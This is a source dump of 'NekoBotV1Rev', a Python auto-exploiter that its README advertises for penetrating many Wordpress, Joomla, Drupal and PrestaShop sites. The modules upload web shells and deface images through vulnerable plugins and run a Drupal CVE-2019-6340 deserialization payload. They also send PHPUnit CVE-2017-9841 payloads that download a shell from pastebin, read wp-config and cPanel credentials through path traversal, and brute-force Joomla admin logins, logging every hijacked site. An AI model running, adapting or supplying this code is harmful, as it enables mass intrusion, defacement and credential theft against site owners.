41 |                 if 'GIF89a' in str(CheckIndex.content):
42 |                     with open('result/Index_results.txt', 'a') as writer:
43 |                         writer.write(site + '/images/stories/' + Jce_Deface_image.split('/')[1] + '\n')
44 |                     return printModule.returnYes(site, 'N/A', 'Com_extplorer', 'Joomla')
45 |                 else:
46 |                     return printModule.returnNo(site, 'N/A', 'Com_extplorer', 'Joomla')
47 |         else:
48 |             return printModule.returnNo(site, 'N/A', 'Com_extplorer', 'Joomla')
49 |     except:
50 |         return printModule.returnNo(site, 'N/A', 'Com_extplorer', 'Joomla')
51 | 
52 | 


--------------------------------------------------------------------------------
/Exploits/Presta_wg24themeadministration.py:
--------------------------------------------------------------------------------
 1 | # coding=utf-8
 2 | import requests
 3 | from Exploits import printModule
 4 | 
 5 | r = '\033[31m'
 6 | g = '\033[32m'
 7 | y = '\033[33m'
 8 | b = '\033[34m'
 9 | m = '\033[35m'
10 | c = '\033[36m'
11 | w = '\033[37m'
12 | Headers = {'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0'}
13 | Jce_Deface_image = 'files/pwn.gif'
14 | ShellPresta = 'files/up.php'
15 | 
16 | 
17 | def Exploit(site):
18 |     Exl = site + '/modules/wg24themeadministration/wg24_ajax.php'
19 |     try:
20 |         Checkvuln = requests.get('http://' + Exl, timeout=5, headers=Headers)
21 |         if Checkvuln.status_code == 200:
22 |             PostData = {'data': 'bajatax',
23 |                         'type': 'pattern_upload'}
24 |             FileDataIndex = {'bajatax': open(Jce_Deface_image, 'rb')}
25 |             FileDataShell = {'bajatax': open(ShellPresta, 'rb')}
26 |             uploadedPathIndex = site + '/modules/wg24themeadministration/img/upload/' \
27 |                                 + Jce_Deface_image.split('/')[1]
28 |             uploadedPathShell = site + '/modules/wg24themeadministration/img/upload/' \
29 |                                 + ShellPresta.split('/')[1]
30 |             requests.post('http://' + Exl, files=FileDataIndex, data=PostData, timeout=5, headers=Headers)
31 |             CheckIndex = requests.get('http://' + uploadedPathIndex, timeout=5, headers=Headers)
32 |             if 'GIF89a' in CheckIndex.content:
33 |                 with open('result/Index_results.txt', 'a') as writer:
34 |                     writer.write(uploadedPathIndex + '\n')
35 |                 requests.post('http://' + Exl, files=FileDataShell, data=PostData,
36 |                               timeout=5, headers=Headers)
37 |                 Checkshell = requests.get('http://' + uploadedPathShell, timeout=5, headers=Headers)
38 |                 if 'Vuln!!' in Checkshell.content:
39 |                     with open('result/Shell_results.txt', 'a') as writer:
40 |                         writer.write(uploadedPathShell + '\n')
41 |                 return printModule.returnYes(site, 'N/A', 'wg24themeadministration Module', 'Prestashop')
42 |             else:
43 |                 return printModule.returnNo(site, 'N/A', 'wg24themeadministration Module', 'Prestashop')
44 |         else:
45 |             return printModule.returnNo(site, 'N/A', 'wg24themeadministration Module', 'Prestashop')
46 |     except:
47 |         return printModule.returnNo(site, 'N/A', 'wg24themeadministration Module', 'Prestashop')
48 | 
49 | 


--------------------------------------------------------------------------------
/Exploits/CVE_2019_6340Drupal8RESTful.py:
--------------------------------------------------------------------------------
 1 | # coding=utf-8
 2 | import requests
 3 | from Exploits import printModule
 4 | 
 5 | r = '\033[31m'
 6 | g = '\033[32m'
 7 | y = '\033[33m'
 8 | b = '\033[34m'
 9 | m = '\033[35m'
10 | c = '\033[36m'
11 | w = '\033[37m'
12 | Headers = {'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0'}
13 | 
14 | 
15 | def Exploit(site):
16 |     flaga = False
17 |     for Node in range(15):
18 |         if Node == 0:
19 |             Node += 1
20 |         headers = {
21 |             'Content-Type': 'application/hal+json',
22 |             'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:64.0) Gecko/20100101 Firefox/64.0'
23 |         }
24 |         try:
25 |             cmd = "echo 'neko!! patch it Now!' > neko.htm"
26 |             Data = r'''{
27 |                 "_links": {
28 |                   "type": { "href": "http://%s/rest/type/shortcut/default"}
29 |                 },
30 |                 "link": [
31 |                   {
32 |                     "options": "O:24:\"GuzzleHttp\\Psr7\\FnStream\":2:{s:33:\"\u0000GuzzleHttp\\Psr7\\FnStream\u0000methods\";a:1:{s:5:\"close\";a:2:{i:0;O:23:\"GuzzleHttp\\HandlerStack\":3:{s:32:\"\u0000GuzzleHttp\\HandlerStack\u0000handler\";s:%d:\"%s\";s:30:\"\u0000GuzzleHttp\\HandlerStack\u0000stack\";a:1:{i:0;a:1:{i:0;s:%d:\"%s\";}}s:31:\"\u0000GuzzleHttp\\HandlerStack\u0000cached\";b:0;}i:1;s:7:\"resolve\";}}s:9:\"_fn_close\";a:2:{i:0;r:4;i:1;s:7:\"resolve\";}}",
33 |                     "value": "link"
34 |                   }
35 |                 ]
36 |               }''' % (site, len(cmd), cmd, len('system'), 'system')
37 |             try:
38 |                 requests.get('http://{}{}'.format(site, '/node/{}?_format=hal_json'.format(str(Node))),
39 |                              data=Data, headers=headers, timeout=10)
40 |                 CheckINDEX = requests.get('http://{}/neko.htm'.format(site), timeout=10, headers=Headers)
41 |                 if 'neko!! patch it Now!' in str(CheckINDEX.content):
42 |                     with open('result/Index_results.txt', 'a') as writer:
43 |                         writer.write(site + '/neko.htm' + '\n')
44 |                     flaga = True
45 |                     break
46 |                 else:
47 |                     pass
48 |             except:
49 |                 pass
50 |         except:
51 |             pass
52 |     if flaga == True:
53 |         return printModule.returnYes(site, 'CVE-2019-6340', 'Drupal 8 RESTful', 'Drupal')
54 |     else:
55 |         return printModule.returnNo(site, 'CVE-2019-6340', 'Drupal 8 RESTful', 'Drupal')
56 | 


--------------------------------------------------------------------------------
/Exploits/Com_rokdownloads.py:
--------------------------------------------------------------------------------
 1 | # coding=utf-8
 2 | import requests
 3 | from Exploits import printModule
 4 | 
 5 | r = '\033[31m'
 6 | g = '\033[32m'
 7 | y = '\033[33m'
 8 | b = '\033[34m'
 9 | m = '\033[35m'
10 | c = '\033[36m'
11 | w = '\033[37m'
12 | Headers = {'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0'}
13 | ShellPresta = 'files/up.php'
14 | Jce_Deface_image = 'files/pwn.gif'
15 | 
16 | 
17 | def Exploit(site):
18 |     try:
19 |         Check = requests.get('http://' + site + '/administrator/components/com_rokdownloads/assets/uploadhandler.php',
20 |                              timeout=10, headers=Headers)
21 |         if Check.status_code == 200 or Check.status_code == 500:
22 |             IndeX = {'files[]': open(Jce_Deface_image, 'rb')}
23 | 
24 |             ShellFile = {'files[]': open(ShellPresta, 'rb')}
25 |             Datapost = {'jpath': '../../../../'}
26 |             requests.post('http://' + site + '/administrator/components/com_rokdownloads/assets/uploadhandler.php',
27 |                           files=ShellFile, data=Datapost, timeout=10, headers=Headers)
28 |             CheckShell = requests.get('http://' + site +
29 |                                       '/images/stories/up.php', timeout=10, headers=Headers)
30 | 
31 |             if 'neko!!' in str(CheckShell.content):
32 |                 with open('result/Shell_results.txt', 'a') as writer:
33 |                     writer.write(site + '/images/stories/up.php\n')
34 |                 return printModule.returnYes(site, 'N/A', 'Com_rokdownloads', 'Joomla')
35 |             else:
36 |                 requests.post('http://' + site + '/administrator/components/com_rokdownloads/assets/uploadhandler.php',
37 |                               files=IndeX, data=Datapost, timeout=10, headers=Headers)
38 | 
39 |                 CheckIndex = requests.get('http://' + site + '/images/stories/' + Jce_Deface_image.split('/')[1],
40 |                                           headers=Headers, timeout=10)
41 |                 if 'GIF89a' in str(CheckIndex.content):
42 |                     with open('result/Index_results.txt', 'a') as writer:
43 |                         writer.write(site + '/images/stories/' + Jce_Deface_image.split('/')[1] + '\n')
44 |                     return printModule.returnYes(site, 'N/A', 'Com_rokdownloads', 'Joomla')
45 |                 else:
46 |                     return printModule.returnNo(site, 'N/A', 'Com_rokdownloads', 'Joomla')
47 |         else:
48 |             return printModule.returnNo(site, 'N/A', 'Com_rokdownloads', 'Joomla')
49 |     except:
50 |         return printModule.returnNo(site, 'N/A', 'Com_rokdownloads', 'Joomla')
51 | 


--------------------------------------------------------------------------------
/Exploits/Headway.py:
--------------------------------------------------------------------------------
 1 | # coding=utf-8
 2 | import requests, re
 3 | from Exploits import printModule
 4 | 
 5 | pagelinesExploitShell = 'files/settings_auto.php'
 6 | Headers = {
 7 |     'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0'
 8 | }
 9 | 
10 | 
11 | 
12 | def Exploit(site):
13 |     try:
14 |         CheckTheme = requests.get('http://' + site, timeout=10, headers=Headers)
15 |         if '/wp-content/themes/headway' in str(CheckTheme.content):
16 |             ThemePath = re.findall('/wp-content/themes/(.*)/style.css', str(CheckTheme.content))
17 |             ShellFile = {'Filedata': open(pagelinesExploitShell, 'rb')}
18 |             url = "http://" + site + "/wp-content/themes/" + ThemePath[0] + \
19 |                   "/library/visual-editor/lib/upload-header.php"
20 |             Check = requests.get(url, timeout=10, headers=Headers)
21 |             if Check.status_code == 200:
22 |                 GoT = requests.post(url, files=ShellFile, headers=Headers)
23 |                 if GoT.status_code == 200:
24 |                     Shell_URL = 'http://' + site + '/wp-content/uploads/headway/header-uploads/' + \
25 |                                 pagelinesExploitShell.split('/')[1]
26 |                     requests.get(Shell_URL, timeout=10, headers=Headers)
27 |                     CheckShell = requests.get('http://' + site + '/wp-content/neko.php',
28 |                                               timeout=10, headers=Headers)
29 |                     CheckIndex = requests.get('http://' + site + '/neko.htm', timeout=10, headers=Headers)
30 |                     if 'neko!!' in str(CheckShell.content):
31 |                         with open('result/Shell_results.txt', 'a') as writer:
32 |                             writer.write(site + '/wp-content/neko.php' + '\n')
33 |                         if 'neko!!' in str(CheckIndex.content):
34 |                             with open('result/Index_results.txt', 'a') as writer:
35 |                                 writer.write(site + '/neko.htm' + '\n')
36 |                         return printModule.returnYes(site, 'N/A', 'Headway Theme', 'Wordpress')
37 |                     else:
38 |                         return printModule.returnNo(site, 'N/A', 'Headway Theme', 'Wordpress')
39 |                 else:
40 |                     return printModule.returnNo(site, 'N/A', 'Headway Theme', 'Wordpress')
41 |             else:
42 |                 return printModule.returnNo(site, 'N/A', 'Headway Theme', 'Wordpress')
43 |         else:
44 |             return printModule.returnNo(site, 'N/A', 'Headway Theme', 'Wordpress')
45 |     except:
46 |         return printModule.returnNo(site, 'N/A', 'Headway Theme', 'Wordpress')
47 | 


--------------------------------------------------------------------------------
/Exploits/Com_SexyContactform.py:
--------------------------------------------------------------------------------
 1 | # coding=utf-8
 2 | import requests
 3 | from Exploits import printModule
 4 | 
 5 | r = '\033[31m'
 6 | g = '\033[32m'
 7 | y = '\033[33m'
 8 | b = '\033[34m'
 9 | m = '\033[35m'
10 | c = '\033[36m'
11 | w = '\033[37m'
12 | Headers = {'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0'}
13 | ShellPresta = 'files/up.php'
14 | Jce_Deface_image = 'files/pwn.gif'
15 | 
16 | def Exploit(site):
17 |     try:
18 |         Check = requests.get('http://' + site + '/components/com_sexycontactform/fileupload/',
19 |                              timeout=10, headers=Headers)
20 |         if Check.status_code == 200:
21 |             IndeX = {'files[]': open(Jce_Deface_image, 'rb')}
22 |             ShellFile = {'files[]': open(ShellPresta, 'rb')}
23 |             requests.post('http://' + site + '/components/com_sexycontactform/fileupload/',
24 |                           files=ShellFile, timeout=10, headers=Headers)
25 |             CheckShell = requests.get('http://' + site +
26 |                                       '/components/com_sexycontactform/fileupload/files/up.php',
27 |                                       timeout=10, headers=Headers)
28 | 
29 |             if 'Vuln!!' in str(CheckShell.content):
30 |                 with open('result/Shell_results.txt', 'a') as writer:
31 |                     writer.write(site + '/components/com_sexycontactform/fileupload/files/up.php\n')
32 |                 return printModule.returnYes(site, 'N/A', 'Com_SexyContactform', 'Joomla')
33 |             else:
34 |                 requests.post('http://' + site + '/components/com_jbcatalog/libraries/jsupload/server/php',
35 |                               files=IndeX, headers=Headers, timeout=10)
36 | 
37 |                 CheckIndex = requests.get('http://' + site + '/components/com_sexycontactform/fileupload/files/'
38 |                                           + Jce_Deface_image.split('/')[1], headers=Headers, timeout=10)
39 |                 if 'GIF89a' in str(CheckIndex.content):
40 |                     with open('result/Index_results.txt', 'a') as writer:
41 |                         writer.write(site + '/components/com_sexycontactform/fileupload/files/'
42 |                                      + Jce_Deface_image.split('/')[1] + '\n')
43 |                     return printModule.returnYes(site, 'N/A', 'Com_SexyContactform', 'Joomla')
44 |                 else:
45 |                     return printModule.returnNo(site, 'N/A', 'Com_SexyContactform', 'Joomla')
46 |         else:
47 |             return printModule.returnNo(site, 'N/A', 'Com_SexyContactform', 'Joomla')
48 |     except:
49 |         return printModule.returnNo(site, 'N/A', 'Com_SexyContactform', 'Joomla')
50 | 
51 | 


--------------------------------------------------------------------------------
/Exploits/CVE_2006_2529fckeditor.py:
--------------------------------------------------------------------------------
 1 | # coding=utf-8
 2 | import requests, re
 3 | from Exploits import printModule
 4 | 
 5 | r = '\033[31m'
 6 | g = '\033[32m'
 7 | y = '\033[33m'
 8 | b = '\033[34m'
 9 | m = '\033[35m'
10 | c = '\033[36m'
11 | w = '\033[37m'
12 | 
13 | Headers = {'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0'}
14 | 
15 | 
16 | def FckPath(zzz):
17 |     try:
18 |         find = re.findall(',"(.*)","', str(zzz))
19 |         path = find[0].strip()
20 |         return path
21 |     except:
22 |         pass
23 | 
24 | 
25 | def Exploit(site, CMS):
26 |     try:
27 |         exp2 = '/fckeditor/editor/filemanager/connectors/php/upload.php?Type=Media'
28 |         try:
29 |             CheckVuln = requests.get('http://' + site + exp2, timeout=10, headers=Headers)
30 |             if 'OnUploadCompleted(202' in str(CheckVuln.content):
31 |                 headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; rv:36.0) Gecko/20100101 Firefox/36.0',
32 |                            'Accept': '*/*'}
33 |                 exp = 'http://' + site + exp2
34 |                 po = {'Content_Type': 'form-data'}
35 |                 fil = {'NewFile': open('files/pwn.gif', 'rb')}
36 |                 rr = requests.post(exp, data=po, headers=headers, timeout=10, files=fil)
37 |                 if '.gif' in str(rr.content):
38 |                     zart = FckPath(rr.content)
39 |                     x = 'http://' + site + str(zart)
40 |                     wcheck2 = requests.get(x, timeout=10, headers=Headers)
41 |                     if wcheck2.status_code == 200:
42 |                         check_deface = requests.get(x, timeout=10, headers=Headers)
43 |                         if 'GIF89a' in str(check_deface.content):
44 |                             with open('result/Index_results.txt', 'a') as writer:
45 |                                 writer.write(site + str(zart) + '\n')
46 |                             return printModule.returnYes(site, 'CVE-2006-2529', 'Fckeditor RFU', CMS)
47 |                         else:
48 |                             return printModule.returnNo(site, 'CVE-2006-2529', 'Fckeditor RFU', CMS)
49 |                     else:
50 |                         return printModule.returnNo(site, 'CVE-2006-2529', 'Fckeditor RFU', CMS)
51 |                 else:
52 |                     return printModule.returnNo(site, 'CVE-2006-2529', 'Fckeditor RFU', CMS)
53 |             else:
54 |                 return printModule.returnNo(site, 'CVE-2006-2529', 'Fckeditor RFU', CMS)
55 |         except:
56 |             return printModule.returnNo(site, 'CVE-2006-2529', 'Fckeditor RFU', CMS)
57 |     except:
58 |         return printModule.returnNo(site, 'CVE-2006-2529', 'Fckeditor RFU', CMS)
59 | 


--------------------------------------------------------------------------------
/BruteForce/Joomla.py:
--------------------------------------------------------------------------------
 1 | # coding=utf-8
 2 | import requests, re, threading, time
 3 | from Exploits import printModule
 4 | r = '\033[31m'
 5 | g = '\033[32m'
 6 | y = '\033[33m'
 7 | b = '\033[34m'
 8 | m = '\033[35m'
 9 | c = '\033[36m'
10 | w = '\033[37m'
11 | Headers = {'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0'}
12 | passwords = open('files/DefaultPasswords_Joomla.txt', 'r').read().splitlines()
13 | 
14 | class JooMLaBruteForce(object):
15 |     def __init__(self):
16 |         self.flag = 0
17 |         self.password = passwords
18 | 
19 |     def Run(self, site):
20 |         thread = []
21 |         for passwd in self.password:
22 |             t = threading.Thread(target=self.Joomla, args=(site, passwd))
23 |             if self.flag == 1:
24 |                 break
25 |             else:
26 |                 t.start()
27 |                 thread.append(t)
28 |                 time.sleep(0.08)
29 |         for j in thread:
30 |             j.join()
31 |         if self.flag == 0:
32 |             return printModule.returnNo(site, 'N/A', 'Joomla Bruteforce', 'Joomla')
33 |         else:
34 |             return printModule.returnYes(site, 'N/A', 'Joomla Bruteforce', 'Joomla')
35 | 
36 |     def Joomla(self, site, passwd):
37 |         try:
38 |             agent = {'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0'}
39 |             sess = requests.session()
40 |             GetToken = sess.get('http://' + site + '/administrator/index.php', timeout=5, headers=agent)
41 |             try:
42 |                 ToKeN = re.findall('type="hidden" name="(.*)" value="1"',
43 |                                    str(GetToken.text))[0]
44 |                 GeTOPtIoN = re.findall('type="hidden" name="option" value="(.*)"', str(GetToken.text))[0]
45 |             except:
46 |                 ToKeN = ''
47 |                 GeTOPtIoN = 'com_login'
48 |             post = {}
49 |             post['username'] = "admin"
50 |             post['passwd'] = passwd
51 |             post['lang'] = 'en-GB'
52 |             post['option'] = GeTOPtIoN
53 |             post['task'] = 'login'
54 |             post[ToKeN] = '1'
55 |             url = "http://" + site + "/administrator/index.php"
56 |             GoT = sess.post(url, data=post, headers=agent, timeout=10)
57 |             if 'logout' in str(GoT.content) and '/index.php?option=com_users&amp;task=user.edit' in str(GoT.content):
58 |                 with open('result/Joomla_Hacked.txt', 'a') as writer:
59 |                     writer.write('http://' + site + '/administrator/index.php' + '\n Username: admin' +
60 |                                  '\n Password: ' + passwd + '\n-----------------------------------------\n')
61 |                 self.flag = 1
62 |         except:
63 |             pass
64 | 
65 | 


--------------------------------------------------------------------------------
/Exploits/CVE_2017_9841PHPUnit.py:
--------------------------------------------------------------------------------
 1 | # coding=utf-8
 2 | import requests
 3 | from Exploits import printModule
 4 | 
 5 | r = '\033[31m'
 6 | g = '\033[32m'
 7 | y = '\033[33m'
 8 | b = '\033[34m'
 9 | m = '\033[35m'
10 | c = '\033[36m'
11 | w = '\033[37m'
12 | 
13 | def Exploit(url, Vulnurl, Vname, CMS):
14 |     headers = {
15 |         "User-Agent": "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) "
16 |                       "AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
17 |     }
18 |     payload = Vulnurl
19 |     PostData1 = '<?php system("curl -O https://pastebin.com/raw/R8JQ6P0Q"); system("mv kojoralohu up.php"); ?>'
20 |     PostData2 = '<?php system("wget https://pastebin.com/raw/R8JQ6P0Q -O up2.php"); ?>'
21 |     PostData3 = '<?php fwrite(fopen("up3.php","w+"),file_get_contents("https://pastebin.com/raw/R8JQ6P0Q")); ?>'
22 |     vulnurl = url + payload
23 |     shell1 = str(vulnurl).replace('eval-stdin.php', 'up.php')
24 |     shell2 = str(vulnurl).replace('eval-stdin.php', 'up2.php')
25 |     shell3 = str(vulnurl).replace('eval-stdin.php', 'up3.php')
26 |     try:
27 |         session = requests.session()
28 |         session.get('http://' + vulnurl, data=PostData1, headers=headers, timeout=10, verify=False, allow_redirects=False)
29 |         session.get('http://' + vulnurl, data=PostData2, headers=headers, timeout=10, verify=False, allow_redirects=False)
30 |         session.get('http://' + vulnurl, data=PostData3, headers=headers, timeout=10, verify=False, allow_redirects=False)
31 |         CheckShell1 = requests.get('http://' + shell1, headers=headers, timeout=10)
32 |         CheckShell2 = requests.get('http://' + shell2, headers=headers, timeout=10)
33 |         CheckShell3 = requests.get('http://' + shell3, headers=headers, timeout=10)
34 |         if 'Vuln!!' in str(CheckShell1.content):
35 |             with open('result/Shell_results.txt', 'a') as writer:
36 |                 writer.write('{}\n'.format(shell1))
37 |             return printModule.returnYes(url, 'CVE-2017-9841', 'PHPUnit {}'.format(Vname), CMS)
38 |         elif 'Vuln!!' in str(CheckShell2.content):
39 |             with open('result/Shell_results.txt', 'a') as writer:
40 |                 writer.write('{}\n'.format(shell2))
41 |             return printModule.returnYes(url, 'CVE-2017-9841', 'PHPUnit {}'.format(Vname), CMS)
42 |         elif 'Vuln!!' in str(CheckShell3.content):
43 |             with open('result/Shell_results.txt', 'a') as writer:
44 |                 writer.write('{}\n'.format(shell3))
45 |             return printModule.returnYes(url, 'CVE-2017-9841', 'PHPUnit {}'.format(Vname), CMS)
46 |         else:
47 |             return printModule.returnNo(url, 'CVE-2017-9841', 'PHPUnit {}'.format(Vname), CMS)
48 |     except:
49 |         return printModule.returnNo(url, 'CVE-2017-9841', 'PHPUnit {}'.format(Vname), CMS)
50 | 


--------------------------------------------------------------------------------
/Exploits/Com_Jbcatalog.py:
--------------------------------------------------------------------------------
 1 | # coding=utf-8
 2 | import requests
 3 | from Exploits import printModule
 4 | 
 5 | r = '\033[31m'
 6 | g = '\033[32m'
 7 | y = '\033[33m'
 8 | b = '\033[34m'
 9 | m = '\033[35m'
10 | c = '\033[36m'
11 | w = '\033[37m'
12 | Headers = {'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0'}
13 | ShellPresta = 'files/up.php'
14 | Jce_Deface_image = 'files/pwn.gif'
15 | 
16 | 
17 | def Exploit(site):
18 |     try:
19 |         Check = requests.get('http://' + site + '/components/com_jbcatalog/libraries/jsupload/server/php',
20 |                              timeout=10, headers=Headers)
21 |         if Check.status_code == 200:
22 |             ShellFile = {'files[]': open(ShellPresta, 'rb')}
23 |             requests.post('http://' + site + '/components/com_jbcatalog/libraries/jsupload/server/php',
24 |                           files=ShellFile, headers=Headers, timeout=10)
25 |             CheckShell = requests.get('http://' + site +
26 |                                       '/components/com_jbcatalog/libraries/jsupload/server/php/files/up.php',
27 |                                       timeout=10, headers=Headers)
28 | 
29 |             if 'Vuln!!' in str(CheckShell.content):
30 |                 with open('result/Shell_results.txt', 'a') as writer:
31 |                     writer.write(site + '/components/com_jbcatalog/libraries/jsupload/server/php/files/up.php\n')
32 |                 return printModule.returnYes(site, 'N/A', 'Com_Jbcatalog', 'Joomla')
33 |             else:
34 |                 ShellFile = {'files[]': open(Jce_Deface_image, 'rb')}
35 |                 requests.post('http://' + site + '/components/com_jbcatalog/libraries/jsupload/server/php',
36 |                               files=ShellFile, headers=Headers, timeout=10)
37 | 
38 |                 CheckIndex = requests.get('http://' + site + '/components/com_jbcatalog/libraries/jsupload/server/'
39 |                                                              'php/files/' + Jce_Deface_image.split('/')[1],
40 |                                           timeout=10, headers=Headers)
41 |                 if 'GIF89a' in str(CheckIndex.content):
42 |                     with open('result/Index_results.txt', 'a') as writer:
43 |                         writer.write(site + '/components/com_jbcatalog/libraries/jsupload/server/php/files/'
44 |                                      + Jce_Deface_image.split('/')[1] + '\n')
45 |                     return printModule.returnYes(site, 'N/A', 'Com_Jbcatalog', 'Joomla')
46 |                 else:
47 |                     return printModule.returnNo(site, 'N/A', 'Com_Jbcatalog', 'Joomla')
48 |         else:
49 |             return printModule.returnNo(site, 'N/A', 'Com_Jbcatalog', 'Joomla')
50 |     except:
51 |         return printModule.returnNo(site, 'N/A', 'Com_Jbcatalog', 'Joomla')
52 | 


--------------------------------------------------------------------------------
/Exploits/Com_facileforms.py:
--------------------------------------------------------------------------------
 1 | # coding=utf-8
 2 | import requests
 3 | from Exploits import printModule
 4 | 
 5 | r = '\033[31m'
 6 | g = '\033[32m'
 7 | y = '\033[33m'
 8 | b = '\033[34m'
 9 | m = '\033[35m'
10 | c = '\033[36m'
11 | w = '\033[37m'
12 | Headers = {'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0'}
13 | ShellPresta = 'files/up.php'
14 | Jce_Deface_image = 'files/pwn.gif'
15 | 
16 | 
17 | def Exploit(site):
18 |     try:
19 |         Check = requests.get('http://' + site + '/components/com_facileforms/libraries/jquery/uploadify.php',
20 |                              timeout=10, headers=Headers)
21 |         if Check.status_code == 200 or Check.status_code == 500:
22 |             IndeX = {'Filedata': open(Jce_Deface_image, 'rb')}
23 |             ShellFile = {'Filedata': open(ShellPresta, 'rb')}
24 |             Datapost = {'folder': '/components/com_facileforms/libraries/jquery/'}
25 |             requests.post('http://' + site + '/components/com_facileforms/libraries/jquery/uploadify.php',
26 |                           files=ShellFile, data=Datapost, timeout=10, headers=Headers)
27 |             CheckShell = requests.get('http://' + site +
28 |                                       '/components/com_facileforms/libraries/jquery/up.php',
29 |                                       timeout=10, headers=Headers)
30 |             if 'Vuln!!' in str(CheckShell.content):
31 |                 with open('result/Shell_results.txt', 'a') as writer:
32 |                     writer.write(site + '/components/com_facileforms/libraries/jquery/up.php\n')
33 |                 return printModule.returnYes(site, 'N/A', 'Com_facileforms', 'Joomla')
34 |             else:
35 |                 requests.post('http://' + site + '/components/com_facileforms/libraries/jquery/uploadify.php',
36 |                               files=IndeX, data=Datapost, timeout=10, headers=Headers)
37 | 
38 |                 CheckIndex = requests.get('http://' + site + '/components/com_facileforms/libraries/jquery/'
39 |                                           + Jce_Deface_image.split('/')[1], headers=Headers, timeout=10)
40 |                 if 'GIF89a' in str(CheckIndex.content):
41 |                     with open('result/Index_results.txt', 'a') as writer:
42 |                         writer.write(site + '/components/com_facileforms/libraries/jquery/'
43 |                                      + Jce_Deface_image.split('/')[1] + '\n')
44 |                     return printModule.returnYes(site, 'N/A', 'Com_facileforms', 'Joomla')
45 |                 else:
46 |                     return printModule.returnNo(site, 'N/A', 'Com_facileforms', 'Joomla')
47 |         else:
48 |             return printModule.returnNo(site, 'N/A', 'Com_facileforms', 'Joomla')
49 |     except:
50 |         return printModule.returnNo(site, 'N/A', 'Com_facileforms', 'Joomla')
51 | 


--------------------------------------------------------------------------------
/Exploits/CVE_2015_1579_revsliderConfig.py:
--------------------------------------------------------------------------------
 1 | # coding=utf-8
 2 | import requests, re
 3 | from Exploits import printModule
 4 | from Tools import cpanel
 5 | 
 6 | r = '\033[31m'
 7 | g = '\033[32m'
 8 | y = '\033[33m'
 9 | b = '\033[34m'
10 | m = '\033[35m'
11 | c = '\033[36m'
12 | w = '\033[37m'
13 | Headers = {'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0'}
14 | 
15 | def Attack(site):
16 |     try:
17 |         agent = {'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0'}
18 |         G = requests.get('http://' + site + '/wp-admin/admin-ajax.php?action=revslider_show_image&img=../../.my.cnf',
19 |                          timeout=7, headers=agent)
20 |         if 'user=' in str(G.content):
21 |             Username = re.findall('user=(.*)', str(G.content))[0]
22 |             Password = re.findall('password="(.*)"', str(G.content))[0]
23 |             with open('result/Cpanel.txt', 'a') as XW:
24 |                 XW.write(' {}/cpanel:{},{}\n'.format(site, Username, Password))
25 |         else:
26 |             pass
27 |     except:
28 |         pass
29 | 
30 | def Exploit(site):
31 |     try:
32 |         Exp = 'http://' + site + \
33 |               '/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php'
34 |         GetConfig = requests.get(Exp, timeout=10, headers=Headers)
35 |         if 'DB_PASSWORD' in str(GetConfig.content):
36 |             Attack(site)
37 |             with open('result/Config_results.txt', 'a') as ww:
38 |                 ww.write('Full Config Path  : ' + Exp + '\n')
39 |             try:
40 |                 #define('DB_USER', 'admin_soljica2');
41 |                 Gethost = re.findall("'DB_HOST', '(.*)'", str(GetConfig.content))
42 |                 Getuser = re.findall("'DB_USER', '(.*)'", str(GetConfig.content))
43 |                 Getpass = re.findall("'DB_PASSWORD', '(.*)'", str(GetConfig.content))
44 |                 Getdb = re.findall("'DB_NAME', '(.*)'", str(GetConfig.content))
45 |                 cpanel.Check(site, Getuser[0], Getpass[0])
46 | 
47 |                 with open('result/Config_results.txt', 'a') as ww:
48 |                     ww.write(' Host:  ' + Gethost[0] + '\n' + ' user:  ' + Getuser[0] +
49 |                              '\n' + ' pass:  ' + Getpass[0] + '\n' + ' DB:    ' + Getdb[
50 |                                  0] + '\n---------------------\n')
51 |                 return printModule.returnYes(site, 'CVE-2015-1579', 'Revslider Config', 'Wordpress')
52 |             except:
53 |                 return printModule.returnYes(site, 'CVE-2015-1579', 'Revslider Config', 'Wordpress')
54 |         else:
55 |             return printModule.returnNo(site, 'CVE-2015-1579', 'Revslider Config', 'Wordpress')
56 |     except:
57 |         return printModule.returnNo(site, 'CVE-2015-1579', 'Revslider Config', 'Wordpress')
58 | 
59 | 


--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
  1 | ### NekoBotV1Rev | Auto Exploiter With 500+ Exploit 2000+ Shell 
  2 | ![Screenshoot](https://github.com/tegal1337/NekoBotV1/blob/master/scrot_2021-04-01-41_680x362.png)<br>
  3 | For Old version [NekobotV1](https://github.com/tegal1337/NekoBotV1-old)<br>
  4 | NekoBotV1Rev is an auto exploit tool to facilitate the penetration of one or many websites (Wordpress, Joomla, Drupal, Magento, Opencart,and Etc). 
  5 | <br>
  6 | #### Features :
  7 | [+] Wordpress :
  8 | <pre>
  9 | 1- Cherry-Plugin
 10 | 2- download-manager Plugin
 11 | 3- wysija-newsletters
 12 | 4- Slider Revolution [Revslider]
 13 | 5- gravity-forms
 14 | 6- userpro
 15 | 7- wp-gdpr-compliance
 16 | 8- wp-graphql
 17 | 9- formcraft
 18 | 10- Headway
 19 | 11- Pagelines Plugin
